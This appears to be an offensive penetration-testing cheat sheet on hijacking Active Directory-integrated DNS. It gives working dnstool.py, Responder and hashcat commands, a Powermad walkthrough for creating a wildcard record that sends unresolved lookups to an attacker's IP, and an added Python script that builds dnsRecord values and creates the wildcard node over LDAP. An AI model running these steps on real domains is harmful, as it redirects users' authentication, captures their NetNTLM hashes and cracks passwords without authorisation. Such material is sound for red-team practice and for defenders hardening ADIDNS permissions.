
ADIDNS Hijacking


Tools: dnstool.py (from krbrelayx), Responder, Powermad (New-ADIDNSNode and friends, Invoke-DNSUpdate)

Requirements:

A victim tries to connect to a hostname that has NO record in the ADIDNS zone (for example a decommissioned host still referenced by a script, scheduled task or mapped drive). Because any authenticated domain user can create new records in an ADIDNS zone by default, we can add an A record for that name pointing at OUR IP address, and the victim's connection (and its NTLM authentication) lands on our listener instead.

python3 dnstool.py -u 'DOMAIN.LOCAL\USER.NAME' -p 'PASS' -r HIJACKED.DOMAIN.LOCAL -a add -d OUR_IP -dns-ip DC_IP DC.DOMAIN.LOCAL (-d is the record data, i.e. the address the new A record resolves to, so it must be OUR IP; -dns-ip is the DNS server used to resolve the DC given as the last argument; the DNS server only serves the new record after its next poll of the zone, typically within 180 seconds)

sudo responder -I tun0 (listen on our interface and capture the victim's NetNTLM hash when it connects to the hijacked name over SMB/HTTP)

hashcat -m 5600 -a 0 ntlmhash.txt /usr/share/wordlists/rockyou.txt (crack the NetNTLMv2 hash; mode 5600 is NetNTLMv2)

ADIDNS Poisoning

How to abuse Active Directory Integrated DNS (ADIDNS) to redirect NTLM authentications to us

  1. By default, any authenticated user can create new ADIDNS records (Authenticated Users can create child objects in the zone)

  2. But it is not possible to change or delete a record we do not own: the creator of a record becomes its owner, and existing records belong to someone else

  3. By default, Windows name resolution tries DNS first and only falls back to LLMNR and then NBT-NS when DNS returns nothing, so a record in ADIDNS wins over classic LLMNR/NBT-NS poisoning and does not depend on the victim broadcasting

If the wildcard record (*) doesn't exist, we can create it: every lookup for a name that has no record of its own then resolves to our IP, and all the resulting authentications arrive on our listener. The exception is WPAD, which the DNS server refuses to answer by default because "wpad" is on the Global Query Block List.

Wildcard attack with Powermad

The character * can't be added through a DNS dynamic update because it breaks the request. But ADIDNS records are stored in LDAP as dnsNode objects (under CN=MicrosoftDNS in the DomainDnsZones partition), so in an AD we can create the record directly via LDAP. This is what Powermad does:

  - get the value populated in the dnsRecord attribute of a node (Get-ADIDNSNodeAttribute)

  - create a wildcard record, setting the dnsRecord and dNSTombstoned attributes (New-ADIDNSNode -Node '*')

  - enable a tombstoned record (Enable-ADIDNSNode)

  - disable a node (Disable-ADIDNSNode)

  - remove a node (Remove-ADIDNSNode)

  - check that the wildcard record works by resolving a name that does not exist (Resolve-DNSName)

DNS update with Invoke-DNSUpdate

Invoke-DNSUpdate (also from Powermad) sends secure dynamic DNS updates over the DNS protocol itself. It works with "classic" records, i.e. ordinary hostnames, but not with the wildcard record, which has to be created via LDAP.

dnstool python tool

dnstool.py talks to the DC over LDAP as well, so it can handle the wildcard record too:

  - check whether the '*' record exists (action query)

  - create a wildcard record (action add with -r '*')

  - disable a node (action remove, which tombstones it)

  - remove a node (action ldapdelete)
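As an added example that is not part of this page, Powermad or dnstool.py, the Python below shows what the Powermad and dnstool lists above manipulate: the dnsRecord attribute of a dnsNode is a binary DNS_RPC_RECORD (MS-DNSP), so the script builds one for an A record, decodes one read back from LDAP, and sketches the LDAP add that creates the wildcard node. The zone name, domain DN, DC hostname, credentials and IP addresses are placeholders, and the LDAP calls assume the ldap3 library.

```python
"""Build/decode ADIDNS dnsRecord values and create a '*' dnsNode over LDAP.

Added example, not Powermad or dnstool.py code. Names, DNs, addresses and
credentials are placeholders; the LDAP helpers assume the ldap3 library.
"""
import ipaddress
import struct

DNS_TYPE_A = 0x0001     # record type A
RANK_ZONE = 0xF0        # RANK_ZONE: authoritative record stored in the zone
RECORD_VERSION = 5      # DNS_RPC_RECORD.Version is always 5
HEADER_LEN = 24         # fixed DNS_RPC_RECORD header that precedes the record data


def build_a_record(ip: str, serial: int = 1, ttl: int = 180) -> bytes:
    """Serialise an A record exactly as it is stored in the dnsRecord attribute.

    Layout (MS-DNSP 2.3.2.2): DataLength, Type, Version, Rank, Flags and Serial
    are little-endian; TtlSeconds is big-endian; Reserved and TimeStamp follow,
    then the record data. TimeStamp 0 marks a static (non-aging) record.
    """
    data = ipaddress.IPv4Address(ip).packed
    header = struct.pack("<HHBBHI", len(data), DNS_TYPE_A, RECORD_VERSION,
                         RANK_ZONE, 0, serial)
    header += struct.pack(">I", ttl)      # TTL is the one big-endian field
    header += struct.pack("<II", 0, 0)    # Reserved, TimeStamp
    return header + data


def parse_dns_record(blob: bytes) -> dict:
    """Decode a dnsRecord value read back from LDAP; A records get an 'address'."""
    if len(blob) < HEADER_LEN:
        raise ValueError("dnsRecord shorter than the DNS_RPC_RECORD header")
    data_len, rtype, version, rank, flags, serial = struct.unpack_from("<HHBBHI", blob, 0)
    (ttl,) = struct.unpack_from(">I", blob, 12)
    _reserved, timestamp = struct.unpack_from("<II", blob, 16)
    data = blob[HEADER_LEN:HEADER_LEN + data_len]
    if len(data) != data_len:
        raise ValueError("dnsRecord truncated: DataLength exceeds buffer")
    record = {"type": rtype, "version": version, "rank": rank, "flags": flags,
              "serial": serial, "ttl": ttl, "timestamp": timestamp, "data": data}
    if rtype == DNS_TYPE_A and data_len == 4:
        record["address"] = str(ipaddress.IPv4Address(data))
    return record


def node_dn(name: str, zone: str, domain_dn: str) -> str:
    """DN of a dnsNode in the default DomainDnsZones partition ('*' = wildcard)."""
    return f"DC={name},DC={zone},CN=MicrosoftDNS,DC=DomainDnsZones,{domain_dn}"


def wildcard_exists(conn, zone: str, domain_dn: str) -> bool:
    """Base-scope search for the '*' node; ldap3 returns False on noSuchObject."""
    from ldap3 import BASE  # assumed dependency, imported lazily so the demo runs offline
    return conn.search(node_dn("*", zone, domain_dn), "(objectClass=dnsNode)",
                       search_scope=BASE, attributes=["dnsRecord", "dNSTombstoned"])


def add_wildcard_node(conn, zone: str, domain_dn: str, our_ip: str) -> bool:
    """Create the '*' dnsNode via LDAP, the same object Powermad/dnstool write.
    The DNS server serves it after its next zone poll (about 180 seconds)."""
    return conn.add(node_dn("*", zone, domain_dn), ["top", "dnsNode"],
                    {"dnsRecord": [build_a_record(our_ip)], "dNSTombstoned": False})


if __name__ == "__main__":
    # Offline demo: round-trip a record like the one New-ADIDNSNode writes.
    blob = build_a_record("10.10.14.5")   # placeholder attacker IP
    print(blob.hex())
    print(parse_dns_record(blob))
    # Online use against a DC (placeholders, not executed here):
    # from ldap3 import Server, Connection, NTLM
    # conn = Connection(Server("dc.domain.local"), user="DOMAIN\\user",
    #                   password="PASS", authentication=NTLM, auto_bind=True)
    # if not wildcard_exists(conn, "domain.local", "DC=domain,DC=local"):
    #     add_wildcard_node(conn, "domain.local", "DC=domain,DC=local", "10.10.14.5")
```

Reading a node's dnsRecord back and running it through parse_dns_record is the quickest way to confirm which IP a record (ours or someone else's) actually points at, and to see the serial and timestamp the server stored.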
